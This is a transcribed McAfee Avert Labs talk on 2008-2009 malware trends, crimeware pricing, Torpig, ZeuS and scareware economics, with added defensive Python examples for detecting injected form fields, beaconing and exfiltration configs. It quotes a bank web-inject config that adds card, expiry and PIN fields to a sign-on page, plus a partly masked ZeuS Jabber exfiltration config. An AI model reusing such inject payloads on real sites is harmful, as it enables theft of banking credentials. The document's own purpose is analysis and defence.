April 10, 2023
Malware - Threats, Trends, Developments
Toralv Dirro, McAfee Avert Labs EMEA Security Strategist
Current weather report
Worldwide at Avert Labs:
• Currently $too_large_a_number distinct pieces of malware identified by Avert Labs
• We have stopped counting; the old method no longer makes sense:
• 50000+ samples are analysed every day
• 95% or more are static (not self-replicating): Trojans and bots
• 90% or more are packed/encrypted: "runtime packers"
Total number of samples
Source: AV-Test.org
Global Malware Vision
(Cumulative)
• Collections: The Great Zoo
Q1-2009: +4.2 million samples
Q2-2009: +4.1 million samples
Self-replicating and static malware
[Chart: share of self-replicating vs. static malware, 0-100%, by year 1999-2008]
Rootkits are becoming the rule, not the exception
Detection Name | Total
Backdoor-AWQ | 64927
W32/Nuwar@MM | 16188
Downloader-BAI | 4213
Backdoor-CKB | 1077
Backdoor-BAC | 834
Motivation yesterday
Motivation today
Source: chat interview with "Dream Coders Team", the developers of MPack, http://www.robertlemos.com/2007/07/23/mpack-interview-chat-sessions-posted/
Today's Threat Landscape
• 500% more malware variations: increase in malware code added from 07 - 08
• 80%: malware is obfuscated (toolkits & obfuscation)
• 60 seconds: a new malicious website detected (Web 2.0 is the catalyst!)
• 90%: of all threats are financially motivated
• 5m: active new zombies per month (attack target: users vs. machines)
Public trading platforms
And the sad result
The underground marketplace
Bank Logons
• A Washington Mutual Bank account in the U.S. with an available balance of $14,400 is priced at 600 euros ($924), while a Citibank UK account with an available balance of 10,044 pounds is priced at 850 euros ($1,310).
• It may appear to be less dangerous to resell access to a bank account rather than to use it directly.
The tools
The Malware Toolkit Marketplace
Crimeware (Author) | Description | Pricing
FirePack (Diel) | Web Exploitation Malware Kit. Note: a Chinese version exists | $3000 (February 2008); $300 (April 2007)
Zupacha, ZeuS and ZUnker ($ash) | The ZeuS trojan is able to inject code into the login web page of a financial organization to ask for personal data and divert it to a remote location. Zupacha is a bot element, and Zunker a C&C. | $1000 for Zupacha, $2000 for Zunker (January 2008)
Adrenaline, an update of Nuclear Grabber (Corpse) | Universal kit for creating tools to capture targeted banking data. Able to intercept and retransmit authentic transactions on the fly between the bank and its client. | $3000
PolySploit, an update of NeoSploit (Grabarz) | Web Exploitation Malware Kit, statistical engine, enhanced configuration capability, exploitation package, enhanced support and online forum for customers. | 100 €
El fiesta | Web Based and PDF-Exploit Pack used to launch attacks and monitor them. | $850 (December 2008)
Turkojan RAT (AlienSoftware) | A Remote Access Tool made in Turkey. | Bronze edition: $99 (July 2008); Silver edition: $179; Gold edition: $249
ZoPack | Web Based PDF-Exploit Pack used to launch attacks and monitor them. | (no price given)
Source: McAfee Avert Labs
CaaS – Crimeware as a Service
Service | Description | Prices Encountered
Proxy Rental | Botnet networks on "per use" (on a monthly basis) or "daily rates" (on a daily basis, over a month) plans. | Daily Limit 50, Qty per Month 1500: $95; Per Use Plan, Qty per Month 1000: $69.95
Web Injection Shop | HTML injection codes designed to steal information from customers of dozens of financial institutions worldwide. Each HTML injection is specifically tailored to match each bank's specific website design. | Each between $10 and $30
Spam facilities | Spamming tools, mailing lists, etc. | 5000/7000 emails per minute, over 1 million emails per day: $2000 per month
Botnet management | HTTP Command & Control facilities for ZeuS malware. | $50 per month
Flooding/DDoS | Complete paralysis of your competitor by flooding his stationary or mobile phone or his web site. | $80 per 24h; 1 hour: $20; 1 day: $100; Large projects: $200
Source: McAfee Avert Labs
Cracking passwords? What for??!
Shark: Compilable multi system back door Trojan
Example of a configuration file
<inject
url="citibank.com"
before="name=password></TD></TR>"
what="
<TR><TD colspan=3 class=smallArial noWrap></TD></TR>
<TR><TD colspan=3 class=smallArial noWrap>
<SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
<TR><TD colspan=3 class=smallArial noWrap></TD></TR>
<TD noWrap colSpan=2><B>Your ATM or Check Card Number:</B></TD>
<TD class=smallArial noWrap align=right></TD></TR>
<TD class=username colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value='' name=cc></TD></TR>
<TD noWrap colSpan=2><B>Expiration Date:</B></TD>
<TD class=smallArial noWrap align=right>(e.g. 07.2007)</TD></TR>
<TD class=username colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value='' name=expdate></TD></TR>
<TD noWrap colSpan=2><B>ATM PIN:</B></TD>
<TD class=smallArial noWrap align=right></TD></TR>
<TR>
<TD class=username colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value='' name=pin></TD></TR>
" block="sign-on."
check="pin"
quan="4"
content="d"
>
</inject>
• The user is on his bank's website
• The SSL certificate is valid, the padlock is shown
• Torpig injects a form into the browser that asks for additional information, in the same style as the website
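The point of the two slides above is that the TLS padlock says nothing about what the browser finally renders: the injected rows are added on the endpoint, after decryption. One defensive consequence is to compare the form the customer actually sees against the form the bank knows it serves. The following is an added example, not code from the presentation or from McAfee: a baseline check over a rendered page snapshot. The baseline field names, the snapshot HTML and the severity hints are constructed for illustration; the three injected inputs (cc, expdate, pin) are the ones from the inject config on the slide.

```python
"""Flag form fields that do not belong on a known sign-on page.

Added example (not from the presentation or from McAfee). The baseline of
legitimate field names and the sample snapshot are constructed; the injected
rows mirror the web-inject config shown on the slide.
"""
from html.parser import HTMLParser

# Constructed baseline: input names the genuine sign-on page is known to carry.
BASELINE_FIELDS = {"citibank.com": {"username", "password"}}

# Substrings that never belong in a sign-on field name; raise severity for them.
SENSITIVE_HINTS = ("cc", "card", "pin", "expdate", "cvv", "ssn")


class InputCollector(HTMLParser):
    """Collect name, type and maxlength of every <input> in a document."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}   # value-less attrs -> ""
        self.inputs.append({"name": a.get("name", "").lower(),
                            "type": a.get("type", "text").lower(),
                            "maxlength": a.get("maxlength", "")})


def audit_form(domain, html):
    """Return findings for every named input not in the baseline for `domain`."""
    parser = InputCollector()
    parser.feed(html)
    expected = BASELINE_FIELDS.get(domain, set())
    findings = []
    for field in parser.inputs:
        if not field["name"] or field["name"] in expected:
            continue
        sensitive = any(h in field["name"] for h in SENSITIVE_HINTS)
        findings.append({"name": field["name"], "type": field["type"],
                         "maxlength": field["maxlength"],
                         "severity": "high" if sensitive else "medium"})
    return findings


# Constructed snapshot of what the browser rendered: the genuine sign-on
# fields followed by the rows the slide's inject config adds.
SNAPSHOT = """
<FORM name=sign-on>
<TR><TD><INPUT name=username type=text></TD></TR>
<TR><TD><INPUT name=password type=password></TD></TR>
<TR><TD colspan=3 class=smallArial noWrap>
<SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
<TD class=username colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value='' name=cc></TD></TR>
<TD class=username colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value='' name=expdate></TD></TR>
<TR><TD class=username colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value='' name=pin></TD></TR>
</FORM>
"""

if __name__ == "__main__":
    for f in audit_form("citibank.com", SNAPSHOT):
        print(f"{f['severity']:6} unexpected field {f['name']!r} "
              f"(type={f['type']}, maxlength={f['maxlength']})")
```

In practice the snapshot would come from a client-side integrity script reporting back to the bank or from an endpoint agent; the comparison itself is deliberately dumb (set difference on field names), because an inject that has to ask for a card number or PIN cannot avoid adding a field for it.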
Delivery
Email attachments: still common
Spear Phishing: “Whaling”
“The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.”
Web 2.0
Emails are being replaced by links in social networks
Koobface gets past the content filter... and exploits trust
Autorun worms
Largely ignored, until Conficker came along
Autorun is a significant infection vector today
Anatomy of an attack: Torpig botnet
1. The victim system (which becomes a bot) sends GET / to a web server with a security vulnerability.
2. <iframe> returned by the web server, pointing to the Mebroot drive-by-download server.
3. GET /?gnh5 (request JS code).
4. Launches exploits; gnh5.exe downloaded; installs Mebroot, injects DLL.
5. Mebroot C&C server.
6. Torpig DLLs injected into IE, Firefox, Outlook, Skype, IM, etc.
7. Torpig C&C server: stolen data uploaded every 20 min.
8. Config file containing bank domains, new C&C servers; 300 domains for target FIs.
9. Injection server URL.
10. Phishing HTML.
Every 2 hours
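The chain above ends with a bot that calls home on a fixed schedule: uploads every 20 minutes, injection data every 2 hours. That regularity is something a defender can look for without knowing the C&C host in advance. The following is an added example, not part of the presentation: a periodicity check over web proxy records that groups requests by (client, destination host) and flags pairs whose inter-request intervals barely vary. The log format, host names, timestamps and thresholds are all constructed for illustration; the C&C host is a placeholder, not a real Torpig indicator.

```python
"""Spot fixed-interval callbacks (beaconing) in web proxy logs.

Added example, not from the presentation. Log lines, hosts and thresholds are
constructed; the log format is "<ISO timestamp> <client> <method> <url>".
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

BASE = datetime(2009, 10, 1, 8, 0, 0)
C2_HOST = "c2.example.invalid"     # placeholder, not a real indicator


def _line(ts, client, url):
    return f"{ts.isoformat()} {client} GET {url}"


# Seven callbacks at a 20-minute period with a second or two of jitter,
# plus ordinary browsing from the same client and from another one.
CONSTRUCTED_LOG = [
    _line(BASE + timedelta(minutes=20 * i, seconds=(i % 3) - 1), "10.0.0.7",
          f"http://{C2_HOST}/upload") for i in range(7)
] + [
    _line(BASE + timedelta(minutes=m), "10.0.0.7", f"http://news.example/{m}")
    for m in (3, 5, 6, 41, 42, 90, 95, 96)
] + [
    _line(BASE + timedelta(minutes=m), "10.0.0.9", "http://intranet.example/")
    for m in (1, 30, 31, 59, 100)
]


def parse(lines):
    """Yield (timestamp, client, host) for each well-formed log line."""
    for line in lines:
        try:
            ts, client, _method, url = line.split(" ", 3)
            host = url.split("//", 1)[1].split("/", 1)[0].lower()
            yield datetime.fromisoformat(ts), client, host
        except (ValueError, IndexError):
            continue  # skip malformed lines instead of aborting the scan


def find_beacons(lines, min_hits=5, max_cv=0.1):
    """Return {(client, host): (period_seconds, hits)} for regular pairs.

    A pair qualifies when it has at least `min_hits` requests and the
    coefficient of variation (stdev / mean) of its inter-request gaps is
    at most `max_cv`. Human browsing is bursty and fails this test.
    """
    series = defaultdict(list)
    for ts, client, host in parse(lines):
        series[(client, host)].append(ts)
    beacons = {}
    for key, times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[key] = (round(avg), len(times))
    return beacons


if __name__ == "__main__":
    for (client, host), (period, hits) in find_beacons(CONSTRUCTED_LOG).items():
        print(f"{client} -> {host}: {hits} requests, period ~{period}s")
```

Real bots add random jitter and sleep through user inactivity, so production versions of this check tolerate a wider coefficient of variation, look at the dominant interval rather than the mean, and whitelist known update and telemetry services that beacon legitimately.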
ZeuS - "human" MITM – Step 1
Maintenance, please wait...
ZeuS - "human" MITM – Step 2
For security, a little math...
ZeuS - "human" MITM – Step 3
For safety's sake, your mobile phone number please
ZeuS - "human" MITM – Step 4
Confirm with iTAN 10
ZeuS - "human" MITM – Step 5
Successfully added (for whatever purpose)
ZeuS - "human" MITM – Step 6
Unfortunately closed today due to maintenance work
ZeuS - "human" MITM Admin Panel
ZeuS – with Instant Messaging
ZeuS Jabber Add-on
[im]
server=jabber.ru
username=glom***
password=qazx*****
to=thekl***@jabber.ru
to1=icq12***@jabber.ru
to2=tank56***@jabber.ru
; name=mask; mask
[keylist]
;key1="login="
key2="injtoken="
key3="inja1="
[list]
;test1=*onlineeast*.bankofamerica.com*
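The config above is what makes the "human" MITM possible: the [im] section names the Jabber account that receives captured logins the moment they are entered, [keylist] names the POST parameters that trigger a message, and [list] holds wildcard masks for the target URLs. The following is an added example, not code from the presentation or from McAfee, showing how an analyst would triage such a config: parse it, pull out the exfiltration indicators (server and recipient accounts) and test observed URLs against the target masks. The sample config is constructed in the slide's layout with placeholder values; only the bankofamerica.com mask is taken from the slide.

```python
"""Triage a ZeuS-style instant-messaging add-on config.

Added example, not from the presentation or from McAfee. The config below is
constructed in the layout of the slide; all account and server values are
placeholders. Lines starting with ';' are comments and are ignored, as they
are by the INI format itself.
"""
import configparser
from fnmatch import fnmatchcase

CONSTRUCTED_CONFIG = """
[im]
server=jabber.example
username=operator-placeholder
password=placeholder
to=receiver1@jabber.example
to1=receiver2@jabber.example
[keylist]
key1="login="
key2="injtoken="
key3="inja1="
[list]
test1=*onlineeast*.bankofamerica.com*
test2=*.example-bank.test/ibank/*
"""


def parse_im_config(text):
    """Return {'server', 'recipients', 'keys', 'masks'} from an INI-style config."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    im = cp["im"] if cp.has_section("im") else {}
    # Recipient accounts are the to, to1, to2, ... keys of the [im] section.
    recipients = [v for k, v in sorted(im.items()) if k.startswith("to")]
    keys = [v.strip('"') for _, v in cp.items("keylist")] if cp.has_section("keylist") else []
    masks = [v.strip('"') for _, v in cp.items("list")] if cp.has_section("list") else []
    return {"server": im.get("server", ""), "recipients": recipients,
            "keys": keys, "masks": masks}


def exfil_indicators(cfg):
    """Server and accounts worth blocking at the egress and hunting for in logs."""
    return sorted({cfg["server"], *cfg["recipients"]} - {""})


def is_targeted(url, cfg):
    """True if `url` matches any wildcard mask in the [list] section."""
    return any(fnmatchcase(url.lower(), m.lower()) for m in cfg["masks"])


def targeted_urls(urls, cfg):
    """Filter a list of observed URLs down to those inside the target list."""
    return [u for u in urls if is_targeted(u, cfg)]


if __name__ == "__main__":
    cfg = parse_im_config(CONSTRUCTED_CONFIG)
    print("exfil indicators:", exfil_indicators(cfg))
    print("trigger parameters:", cfg["keys"])
    # Constructed URLs to test against the masks.
    sample = ["https://onlineeast3.bankofamerica.com/login",
              "https://www.example-bank.test/ibank/auth",
              "https://www.example.org/"]
    print("targeted:", targeted_urls(sample, cfg))
```

Two details matter for triage. Commented-out entries (the slide's ";test1=" and ";key1=" lines) are inactive and must not be reported as current targets, which the INI parser handles by dropping them. And the masks are shell-style globs, so a mask like *onlineeast*.bankofamerica.com* covers every host in that naming scheme, not one URL; expanding the masks against the institution's real hostnames is how one learns which login pages are in scope.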
Malware / Crimeware
• URLZone
– The Trojan calls back to its command and control server for specific instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction.
– http://vil.nai.com/vil/content/v_237377.htm (Downloader-BQZ.a)
– http://www.darkreading.com/database_security/security/client/showArticle.jhtml?articleID=220300592
This statement shows a transaction of 53.94 Euros when actually 8,571.31 Euros was removed from the account. The balance has been changed by the Trojan. (http://www.geek.com/articles/news/malware-now-covers-its-tracks-in-bank-statements-20090930/)
Is Your Computer Infected (by a Fake Anti-Virus)?
[Chart with panels Q1, Q2, Q3]
They Are Popular Because They Work and Look Valid
People and Economy behind it
Good at Crime, clueless about Security
• Goal: Tracking distribution sites
• Discovered: Everything
– Product lists
– Tech Support Calls
– Project Documentation
– Affiliate Lists
– Source code
– Employee lists
– And much more...
FOCUS 09: Anatomy of a scareware company
http://www.internetnews.com/security/article.php/3842936/McAfee+FOCUS+09+Anatomy+of+a+Scareware+Scam.htm
Using more than 63 gigabytes of information culled from querying the company's own portal servers and other publicly available data, Dirk Kollberg, from McAfee Labs, unearthed some astonishing operational details including the following:
• Innovative Marketing used more than 34 different production servers in less than six months and used as many as six different servers at a time to infect, advertise and sell their illicit wares.
• In one 10-day stretch, the company received more than 4 million download requests, meaning that at least 4 million people tried to buy the worthless applications.
• Internal documents report that the URLs used to hawk the scareware are only valid for 15 minutes, making it all but impossible for federal, state or international law enforcement agencies to yank the offending URLs before they've moved on to new addresses.
• It used multiple customer call centers, including at least one in Poland and one in India, to service unsuspecting customers calling via VoIP connections to buy, remove or question the need for the unnecessary scareware. And, believe it or not, they recorded and saved these bogus customer service calls. More incredibly, 95 percent of callers exited "happy" when the call concluded.
• Because they needed an extensive network of ISPs to pull off the scam, Innovative Marketing kept detailed spreadsheets with all the ISPs' pertinent data including price, location and, most telling, a column that rates the ISPs' "abuseability"—essentially an assessment of which ISPs would play ball and not ask questions as they went about their business.
• The company added a whopping 4.5 million order IDs, essentially new purchases, in 11 months last year. With most of the phony applications selling for $39.95, that's more than $180 million in less than a year.
Questions? More info?
• Read the Avert Labs Security Blog – http://www.avertlabs.com/research/blog
• Listen to the AudioParasitics Podcast – http://www.audioparasitics.com
• Read the Monthly Spam Report – http://www.mcafee.com
• Read the McAfee Quarterly Threat Report – http://www.mcafee.com
• Read the McAfee Security Journal – http://www.mcafee.com
• Watch the Stop H*Commerce Series – http://www.stophcommerce.com